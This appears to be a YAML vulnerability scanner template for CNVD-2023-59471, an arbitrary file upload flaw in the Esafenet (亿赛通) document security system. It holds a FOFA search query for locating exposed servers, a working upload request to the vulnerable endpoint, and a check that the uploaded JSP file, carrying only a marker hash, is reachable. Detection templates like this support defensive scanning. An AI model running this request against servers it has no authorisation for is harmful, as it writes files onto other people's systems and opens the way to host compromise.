product: 亿赛通-电子文档安全管理系统
vName: 亿赛通-电子文档安全管理系统 UploadFileFromClientServiceForClient 任意文件上传
type: 文件上传
vID:
  - CNVD-2023-59471
level: 3
vDesc: 亿赛通 电子文档安全管理系统 UploadFileFromClientServiceForClient 接口存在任意文件上传漏洞，攻击者通过漏洞可以上传任意文件到服务器中，获取主机权限。
version: ''
note: ''
search:
  FOFA: app="亿赛通-电子文档安全管理系统"
protocol: http
link: https://www.cnblogs.com/fuchangjiang/p/17718451.html
fix: [ ]
model: ''
logic: and
exploit:
  - exp:
      method: post
      follow: false
      path: /CDGServer3/UploadFileFromClientServiceForClient?AFMALANMJCEOENIBDJMKFHBANGEPKHNOFJBMIFJPFNKFOKHJNMLCOIDDJGNEIPOLOKGAFAFJHDEJPHEPLFJHDGPBNELNFIICGFNGEOEFBKCDDCGJEPIKFHJFAOOHJEPNNCLFHDAFDNCGBAEELJFFHABJPDPIEEMIBOECDMDLEPBJGBGCGLEMBDFAGOGM
      data: 95cc64dd2825f9df13ec4ad683ecf339
    verify:
      path: /tttT.jsp
      logic: and
      check:
        - status: 200
          body:
            value:
              - 95cc64dd2825f9df13ec4ad683ecf339
            logic: and